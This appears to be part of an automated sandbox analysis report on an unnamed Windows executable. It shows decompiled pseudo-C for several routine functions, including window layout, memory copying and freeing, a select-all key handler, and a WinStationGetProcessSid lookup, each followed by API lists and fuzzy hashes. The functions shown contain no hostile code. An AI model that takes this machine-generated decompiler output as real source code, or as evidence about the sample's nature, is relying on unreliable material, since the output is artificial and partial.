                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406791
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004067C7
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004067DA
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004067ED
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00406800
                                                                                                                • free.MSVCRT(00000000), ref: 00406839
                                                                                                                  • Part of subcall function 004055D1: free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ??3@$free
                                                                                                                • String ID:
                                                                                                                • API String ID: 2241099983-0
                                                                                                                • Opcode ID: fae72e90abf19a0f598a0744b86edfa2e5e81d8d411ebeda80197a1c121c0671
                                                                                                                • Instruction ID: 35b4881f8254e3ed5d778deec4dde62c4732b660dc94e1daad4ca6c431b67ac1
                                                                                                                • Opcode Fuzzy Hash: fae72e90abf19a0f598a0744b86edfa2e5e81d8d411ebeda80197a1c121c0671
                                                                                                                • Instruction Fuzzy Hash: 4E010233902D209BCA217B2A950541FB395FE82B24316807FE802772C5CF38AC618AED
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00405CF8, Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00405CF8(void* __esi, struct HWND__* _a4, signed int _a8) {
				intOrPtr _v12;
				struct tagPOINT _v20;
				struct tagRECT _v36;
				int _t27;
				struct HWND__* _t30;
				struct HWND__* _t32;

				_t30 = _a4;
				if((_a8 & 0x00000001) != 0) {
					_t32 = GetParent(_t30);
					GetWindowRect(_t30,  &_v20);
					GetClientRect(_t32,  &_v36);
					MapWindowPoints(0, _t32,  &_v20, 2);
					_t27 = _v36.right - _v12 - _v36.left;
					_v20.x = _t27;
					SetWindowPos(_t30, 0, _t27, _v20.y, 0, 0, 5);
				}
				if((_a8 & 0x00000002) != 0) {
					E00404FBB(_t30);
				}
				return 1;
			}









                                                                                                                0x00405d03
                                                                                                                0x00405d06
                                                                                                                0x00405d10
                                                                                                                0x00405d17
                                                                                                                0x00405d22
                                                                                                                0x00405d32
                                                                                                                0x00405d40
                                                                                                                0x00405d48
                                                                                                                0x00405d4e
                                                                                                                0x00405d54
                                                                                                                0x00405d59
                                                                                                                0x00405d5c
                                                                                                                0x00405d61
                                                                                                                0x00405d67

                                                                                                                APIs
                                                                                                                • GetParent.USER32(?), ref: 00405D0A
                                                                                                                • GetWindowRect.USER32 ref: 00405D17
                                                                                                                • GetClientRect.USER32 ref: 00405D22
                                                                                                                • MapWindowPoints.USER32 ref: 00405D32
                                                                                                                • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00405D4E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Window$Rect$ClientParentPoints
                                                                                                                • String ID:
                                                                                                                • API String ID: 4247780290-0
                                                                                                                • Opcode ID: a641cd19a410ed6a125ee0f2f41aa3775212a32dac042a11be58197803c42fc2
                                                                                                                • Instruction ID: c328b93d85e4c90ccc2b92edbac8192aeb41fc184e748709fb0c9a3f9f2b3a5a
                                                                                                                • Opcode Fuzzy Hash: a641cd19a410ed6a125ee0f2f41aa3775212a32dac042a11be58197803c42fc2
                                                                                                                • Instruction Fuzzy Hash: 41012932801029BBDB119BA59D8DEFFBFBCEF46750F04822AF901A2151D73895028BA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004083DC, Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 89%
                                                                                                                			E004083DC(void* __eax, int __ebx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				void* _t20;
				void* _t21;
				signed int _t28;
				void* _t32;
				void* _t34;

				_t20 = __eax;
				_v12 = _v12 & 0x00000000;
				_push(__ebx);
				_t28 = __eax - 1;
				L0040B26C();
				_v16 = __eax;
				if(_t28 > 0) {
					_t21 = _a4;
					_v8 = __ebx;
					_v8 =  ~_v8;
					_t32 = _t28 * __ebx + _t21;
					_a4 = _t21;
					do {
						memcpy(_v16, _a4, __ebx);
						memcpy(_a4, _t32, __ebx);
						_t20 = memcpy(_t32, _v16, __ebx);
						_a4 = _a4 + __ebx;
						_t32 = _t32 + _v8;
						_t34 = _t34 + 0x24;
						_v12 = _v12 + 1;
						_t28 = _t28 - 1;
					} while (_t28 > _v12);
				}
				_push(_v16);
				L0040B272();
				return _t20;
			}











                                                                                                                0x004083dc
                                                                                                                0x004083e2
                                                                                                                0x004083e9
                                                                                                                0x004083ea
                                                                                                                0x004083eb
                                                                                                                0x004083f3
                                                                                                                0x004083f6
                                                                                                                0x004083f8
                                                                                                                0x00408401
                                                                                                                0x00408404
                                                                                                                0x00408407
                                                                                                                0x00408409
                                                                                                                0x0040840c
                                                                                                                0x00408413
                                                                                                                0x0040841d
                                                                                                                0x00408427
                                                                                                                0x0040842c
                                                                                                                0x0040842f
                                                                                                                0x00408432
                                                                                                                0x00408435
                                                                                                                0x00408438
                                                                                                                0x00408439
                                                                                                                0x0040843e
                                                                                                                0x0040843f
                                                                                                                0x00408442
                                                                                                                0x0040844a

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memcpy$??2@??3@
                                                                                                                • String ID:
                                                                                                                • API String ID: 1252195045-0
                                                                                                                • Opcode ID: ae14ed78cb3b9c7a1656bdd7c9bb9ccf218141e25ab2435f791856beeb738110
                                                                                                                • Instruction ID: 529a25ebd12540bef40c4bbbf5f662c822a20cdbd1f214c79cf6c3b5efc5d95d
                                                                                                                • Opcode Fuzzy Hash: ae14ed78cb3b9c7a1656bdd7c9bb9ccf218141e25ab2435f791856beeb738110
                                                                                                                • Instruction Fuzzy Hash: 61017176C0410CBBCF006F99D8859DEBBB8EF40394F1080BEF80476161D7355E519B98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00406746, Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 76%
                                                                                                                			E00406746(void* __esi) {
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr _t11;
				intOrPtr* _t18;
				void* _t19;

				_t19 = __esi;
				_t9 =  *((intOrPtr*)(__esi + 0x30));
				if(_t9 != 0) {
					_push(_t9);
					L0040B272();
				}
				_t10 =  *((intOrPtr*)(_t19 + 0x40));
				if(_t10 != 0) {
					_push(_t10);
					L0040B272();
				}
				_t11 =  *((intOrPtr*)(_t19 + 0x2d4));
				if(_t11 != 0) {
					_push(_t11);
					L0040B272();
				}
				_t18 =  *((intOrPtr*)(_t19 + 0x2c0));
				if(_t18 != 0) {
					_t11 =  *_t18;
					if(_t11 != 0) {
						_push(_t11);
						L0040B272();
						 *_t18 = 0;
					}
					_push(_t18);
					L0040B272();
				}
				 *((intOrPtr*)(_t19 + 0x2c0)) = 0;
				 *((intOrPtr*)(_t19 + 0x30)) = 0;
				 *((intOrPtr*)(_t19 + 0x40)) = 0;
				 *((intOrPtr*)(_t19 + 0x2d4)) = 0;
				return _t11;
			}








                                                                                                                0x00406746
                                                                                                                0x00406746
                                                                                                                0x0040674f
                                                                                                                0x00406751
                                                                                                                0x00406752
                                                                                                                0x00406757
                                                                                                                0x00406758
                                                                                                                0x0040675d
                                                                                                                0x0040675f
                                                                                                                0x00406760
                                                                                                                0x00406765
                                                                                                                0x00406766
                                                                                                                0x0040676e
                                                                                                                0x00406770
                                                                                                                0x00406771
                                                                                                                0x00406776
                                                                                                                0x00406777
                                                                                                                0x0040677f
                                                                                                                0x00406781
                                                                                                                0x00406785
                                                                                                                0x00406787
                                                                                                                0x00406788
                                                                                                                0x0040678e
                                                                                                                0x0040678e
                                                                                                                0x00406790
                                                                                                                0x00406791
                                                                                                                0x00406796
                                                                                                                0x00406798
                                                                                                                0x0040679e
                                                                                                                0x004067a1
                                                                                                                0x004067a4
                                                                                                                0x004067ab

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ??3@
                                                                                                                • String ID:
                                                                                                                • API String ID: 613200358-0
                                                                                                                • Opcode ID: 086bdf89973be9db751c02ba5940a011d1fc21caf14060528ff21e4da5d0ecd6
                                                                                                                • Instruction ID: 2146815d826ad61a6329a34e2799f13692f9223f7a0132405705f454cb51ab02
                                                                                                                • Opcode Fuzzy Hash: 086bdf89973be9db751c02ba5940a011d1fc21caf14060528ff21e4da5d0ecd6
                                                                                                                • Instruction Fuzzy Hash: E1F0ECB2504701DBDB24AE7D99C881FA7E9BB05318B65087FF14AE3680C738B850461C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040ABA5, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 87%
                                                                                                                			E0040ABA5(intOrPtr __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				struct HDWP__* _v8;
				intOrPtr _v12;
				void* __ebx;
				intOrPtr _t37;
				intOrPtr _t42;
				RECT* _t44;

				_push(__ecx);
				_push(__ecx);
				_t42 = __ecx;
				_v12 = __ecx;
				if(_a4 != 5) {
					if(_a4 != 0xf) {
						if(_a4 == 0x24) {
							_t37 = _a12;
							 *((intOrPtr*)(_t37 + 0x18)) = 0xc8;
							 *((intOrPtr*)(_t37 + 0x1c)) = 0xc8;
						}
					} else {
						E00402EC8(__ecx + 0x378);
					}
				} else {
					_v8 = BeginDeferWindowPos(3);
					_t44 = _t42 + 0x378;
					E00402E22(_t44, _t21, 0x65, 0, 0, 1, 1);
					E00402E22(_t44, _v8, 1, 1, 1, 0, 0);
					E00402E22(_t44, _v8, 2, 1, 1, 0, 0);
					EndDeferWindowPos(_v8);
					InvalidateRect( *(_t44 + 0x10), _t44, 1);
					_t42 = _v12;
				}
				return E00402CED(_t42, _a4, _a8, _a12);
			}









                                                                                                                0x0040aba8
                                                                                                                0x0040aba9
                                                                                                                0x0040abb0
                                                                                                                0x0040abb2
                                                                                                                0x0040abb5
                                                                                                                0x0040ac19
                                                                                                                0x0040ac2c
                                                                                                                0x0040ac2e
                                                                                                                0x0040ac36
                                                                                                                0x0040ac39
                                                                                                                0x0040ac39
                                                                                                                0x0040ac1b
                                                                                                                0x0040ac21
                                                                                                                0x0040ac21
                                                                                                                0x0040abb7
                                                                                                                0x0040abcb
                                                                                                                0x0040abce
                                                                                                                0x0040abd7
                                                                                                                0x0040abe6
                                                                                                                0x0040abf6
                                                                                                                0x0040abfe
                                                                                                                0x0040ac09
                                                                                                                0x0040ac0f
                                                                                                                0x0040ac12
                                                                                                                0x0040ac4f

                                                                                                                APIs
                                                                                                                • BeginDeferWindowPos.USER32 ref: 0040ABBA
                                                                                                                  • Part of subcall function 00402E22: GetDlgItem.USER32 ref: 00402E32
                                                                                                                  • Part of subcall function 00402E22: GetClientRect.USER32 ref: 00402E44
                                                                                                                  • Part of subcall function 00402E22: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00402EB4
                                                                                                                • EndDeferWindowPos.USER32(?), ref: 0040ABFE
                                                                                                                • InvalidateRect.USER32(?,?,00000001), ref: 0040AC09
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: DeferWindow$Rect$BeginClientInvalidateItem
                                                                                                                • String ID: $
                                                                                                                • API String ID: 2498372239-3993045852
                                                                                                                • Opcode ID: 3646c4f7f2df3bce7363561434de74107494107a1dc9a7f0debf38e758269ced
                                                                                                                • Instruction ID: c4de0c57513a3fc8bb763215dcca23c205eee760976c5819edcd99f4220bed98
                                                                                                                • Opcode Fuzzy Hash: 3646c4f7f2df3bce7363561434de74107494107a1dc9a7f0debf38e758269ced
                                                                                                                • Instruction Fuzzy Hash: 9A11ACB1544208FFEB229F51CD88DAF7A7CEB85788F10403EF8057A280C6758E52DBA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00403A73, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54keyboardwindowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00403A73(void* __esi, struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t14;

				if(_a8 == 0x100 && _a12 == 0x41) {
					GetKeyState(0xa2);
					if(E00403A60(0xa2) != 0 || E00403A60(0xa3) != 0) {
						if(E00403A60(0xa0) == 0 && E00403A60(0xa1) == 0 && E00403A60(0xa4) == 0) {
							_t14 = E00403A60(0xa5);
							if(_t14 == 0) {
								SendMessageW(_a4, 0xb1, _t14, 0xffffffff);
							}
						}
					}
				}
				return CallWindowProcW( *0x40f2f0, _a4, _a8, _a12, _a16);
			}




                                                                                                                0x00403a7d
                                                                                                                0x00403a8c
                                                                                                                0x00403a9c
                                                                                                                0x00403aba
                                                                                                                0x00403adf
                                                                                                                0x00403ae7
                                                                                                                0x00403af4
                                                                                                                0x00403af4
                                                                                                                0x00403ae7
                                                                                                                0x00403aba
                                                                                                                0x00403a9c
                                                                                                                0x00403b13

                                                                                                                APIs
                                                                                                                • GetKeyState.USER32(000000A2), ref: 00403A8C
                                                                                                                  • Part of subcall function 00403A60: GetKeyState.USER32(?), ref: 00403A64
                                                                                                                • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00403AF4
                                                                                                                • CallWindowProcW.USER32(?,00000100,?,?), ref: 00403B0C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: State$CallMessageProcSendWindow
                                                                                                                • String ID: A
                                                                                                                • API String ID: 3924021322-3554254475
                                                                                                                • Opcode ID: 7a91954c753d57b62ada695ad1095f0bf88fde31d04a203a00175be824b18610
                                                                                                                • Instruction ID: 3f4bab65c8f2f559ff61c6136e8e970ba349fdfc906a465d58382778652fa82c
                                                                                                                • Opcode Fuzzy Hash: 7a91954c753d57b62ada695ad1095f0bf88fde31d04a203a00175be824b18610
                                                                                                                • Instruction Fuzzy Hash: AC01483130430AAEFF11DFE59D02ADA3A5CAF15327F114036FA96B81D1DBB887506E59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004034F0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 51COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 91%
                                                                                                                			E004034F0(void* __ecx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v20;
				char _v1072;
				void _v3672;
				char _v4496;
				intOrPtr _v4556;
				char _v4560;
				void* __edi;
				void* __esi;
				intOrPtr* _t41;
				void* _t45;

				_t45 = __eflags;
				E0040B550(0x11cc, __ecx);
				E00402923( &_v4560);
				_v4560 = 0x40db44;
				E00406670( &_v4496, _t45);
				_v4496 = 0x40dab0;
				memset( &_v3672, 0, 0x10);
				E0040A909( &_v1072);
				_t41 = _a4;
				_v4556 = 0x71;
				if(E00402CD5( &_v4560,  *((intOrPtr*)(_t41 + 0x10))) != 0) {
					L0040B266();
					 *((intOrPtr*)( *_t41 + 4))(1, _v20, _t41 + 0x5b2c, 0xa);
				}
				_v4496 = 0x40dab0;
				_v4560 = 0x40db44;
				E004067AC( &_v4496);
				return E00402940( &_v4560);
			}













                                                                                                                0x004034f0
                                                                                                                0x004034f8
                                                                                                                0x00403506
                                                                                                                0x00403516
                                                                                                                0x0040351c
                                                                                                                0x00403531
                                                                                                                0x00403537
                                                                                                                0x00403545
                                                                                                                0x0040354a
                                                                                                                0x00403556
                                                                                                                0x00403567
                                                                                                                0x00403575
                                                                                                                0x00403583
                                                                                                                0x00403583
                                                                                                                0x00403586
                                                                                                                0x00403592
                                                                                                                0x00403598
                                                                                                                0x004035ac

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00402923: memset.MSVCRT ref: 00402935
                                                                                                                  • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 004066B9
                                                                                                                  • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 004066E0
                                                                                                                  • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 00406701
                                                                                                                  • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 00406722
                                                                                                                • memset.MSVCRT ref: 00403537
                                                                                                                • _ultow.MSVCRT ref: 00403575
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ??2@$memset$_ultow
                                                                                                                • String ID: cf@$q
                                                                                                                • API String ID: 3448780718-2693627795
                                                                                                                • Opcode ID: 5a770fb105266b5f281bf636f392918a38755f6c8491aba89f246a667f584aac
                                                                                                                • Instruction ID: aa1ed1bb2df2d11c17fc3d40a8ec787ac421495c908f782690464d4e039b4fd8
                                                                                                                • Opcode Fuzzy Hash: 5a770fb105266b5f281bf636f392918a38755f6c8491aba89f246a667f584aac
                                                                                                                • Instruction Fuzzy Hash: 73113079A402186ACB24AB55DC41BCDB7B4AF45304F0084BAEB09771C1D7796E888FD8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00407E24, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 64%
                                                                                                                			E00407E24(intOrPtr* __ecx, intOrPtr _a4) {
				void _v514;
				signed short _v516;
				void _v1026;
				signed short _v1028;
				void* __esi;
				void* _t17;
				intOrPtr* _t26;
				signed short* _t28;

				_v516 = _v516 & 0x00000000;
				_t26 = __ecx;
				memset( &_v514, 0, 0x1fc);
				_v1028 = _v1028 & 0x00000000;
				memset( &_v1026, 0, 0x1fc);
				_t17 =  *((intOrPtr*)( *_t26 + 0x24))();
				_t28 =  &_v516;
				E00407250(_t28, _t17);
				_push(_t28);
				_push(L"</%s>\r\n");
				_push(0xff);
				_push( &_v1028);
				L0040B1EC();
				return E00407343(_t26, _a4,  &_v1028);
			}











                                                                                                                0x00407e2d
                                                                                                                0x00407e46
                                                                                                                0x00407e48
                                                                                                                0x00407e4d
                                                                                                                0x00407e5f
                                                                                                                0x00407e6b
                                                                                                                0x00407e6f
                                                                                                                0x00407e75
                                                                                                                0x00407e7c
                                                                                                                0x00407e7d
                                                                                                                0x00407e88
                                                                                                                0x00407e8d
                                                                                                                0x00407e8e
                                                                                                                0x00407eaa

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00407E48
                                                                                                                • memset.MSVCRT ref: 00407E5F
                                                                                                                  • Part of subcall function 00407250: wcscpy.MSVCRT ref: 00407255
                                                                                                                  • Part of subcall function 00407250: _wcslwr.MSVCRT ref: 00407288
                                                                                                                • _snwprintf.MSVCRT ref: 00407E8E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                • String ID: </%s>
                                                                                                                • API String ID: 3400436232-259020660
                                                                                                                • Opcode ID: 8ed6d9153b8ab756a1282c4525cb1f33682d7d4062ac2741ec7bca21e753fd7d
                                                                                                                • Instruction ID: 202c728a503fdded71e402cbdefdfedacf6d04e10f6749ebe2a15fa747ba2321
                                                                                                                • Opcode Fuzzy Hash: 8ed6d9153b8ab756a1282c4525cb1f33682d7d4062ac2741ec7bca21e753fd7d
                                                                                                                • Instruction Fuzzy Hash: 820186B2D4012966D720A795CC46FEE766CEF44318F0004FABB08F71C2DB78AB458AD8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00405E0A, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 77%
                                                                                                                			E00405E0A(intOrPtr __ecx, void* __eflags, struct HWND__* _a4) {
				void _v8198;
				short _v8200;
				void* _t9;
				void* _t12;
				intOrPtr _t19;
				intOrPtr _t20;

				_t19 = __ecx;
				_t9 = E0040B550(0x2004, __ecx);
				_t20 = _t19;
				if(_t20 == 0) {
					_t20 =  *0x40fe24; // 0x0
				}
				_t25 =  *0x40fb90;
				if( *0x40fb90 != 0) {
					_v8200 = _v8200 & 0x00000000;
					memset( &_v8198, 0, 0x2000);
					_push(_t20);
					_t12 = 5;
					E00405E8D(_t12);
					if(E00405F39(_t19, _t25, L"caption",  &_v8200) != 0) {
						SetWindowTextW(_a4,  &_v8200);
					}
					return EnumChildWindows(_a4, E00405DAC, 0);
				}
				return _t9;
			}









                                                                                                                0x00405e0a
                                                                                                                0x00405e12
                                                                                                                0x00405e18
                                                                                                                0x00405e1c
                                                                                                                0x00405e1e
                                                                                                                0x00405e1e
                                                                                                                0x00405e24
                                                                                                                0x00405e2c
                                                                                                                0x00405e2e
                                                                                                                0x00405e44
                                                                                                                0x00405e49
                                                                                                                0x00405e4c
                                                                                                                0x00405e4d
                                                                                                                0x00405e68
                                                                                                                0x00405e74
                                                                                                                0x00405e74
                                                                                                                0x00000000
                                                                                                                0x00405e84
                                                                                                                0x00405e8c

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                                • String ID: caption
                                                                                                                • API String ID: 1523050162-4135340389
                                                                                                                • Opcode ID: 8feeb8209b6c70e9adfa8bd3f92da79707fac4aecb0355a736b6ddf0df3d27b2
                                                                                                                • Instruction ID: ff9fcce37bd20e8a069aa1bb12297d26d3abb42d57bfe77991e9b0a8e19eae59
                                                                                                                • Opcode Fuzzy Hash: 8feeb8209b6c70e9adfa8bd3f92da79707fac4aecb0355a736b6ddf0df3d27b2
                                                                                                                • Instruction Fuzzy Hash: 2DF04432940718AAEB20AB54DD4EB9B3668DB04754F0041B7BA04B61D2D7B8AE40CEDC
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00409A46, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00409A46(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				struct HINSTANCE__* _t11;
				struct HINSTANCE__** _t14;
				struct HINSTANCE__* _t15;

				_t14 = __eax;
				if( *((intOrPtr*)(__eax)) == 0) {
					_t11 = E00405436(L"winsta.dll");
					 *_t14 = _t11;
					if(_t11 != 0) {
						_t14[1] = GetProcAddress(_t11, "WinStationGetProcessSid");
					}
				}
				_t15 = _t14[1];
				if(_t15 == 0) {
					return 0;
				} else {
					return _t15->i(0, _a4, _a16, _a20, _a8, _a12);
				}
			}






                                                                                                                0x00409a4a
                                                                                                                0x00409a4f
                                                                                                                0x00409a56
                                                                                                                0x00409a5e
                                                                                                                0x00409a60
                                                                                                                0x00409a6e
                                                                                                                0x00409a6e
                                                                                                                0x00409a60
                                                                                                                0x00409a71
                                                                                                                0x00409a76
                                                                                                                0x00000000
                                                                                                                0x00409a78
                                                                                                                0x00000000
                                                                                                                0x00409a89

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                  • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                • GetProcAddress.KERNEL32(00000000,WinStationGetProcessSid), ref: 00409A68
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad$AddressProcmemsetwcscat
                                                                                                                • String ID: WinStationGetProcessSid$winsta.dll$Y@
                                                                                                                • API String ID: 946536540-379566740
                                                                                                                • Opcode ID: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
                                                                                                                • Instruction ID: f8fd4ca1437852706c932511ef9fc121d1f4ef25cad53c4396aefa54a2cc69ea
                                                                                                                • Opcode Fuzzy Hash: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
                                                                                                                • Instruction Fuzzy Hash: 4AF08236644219AFCF219FE09C01B977BD5AB08710F00443AF945B21D1D67588509F98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

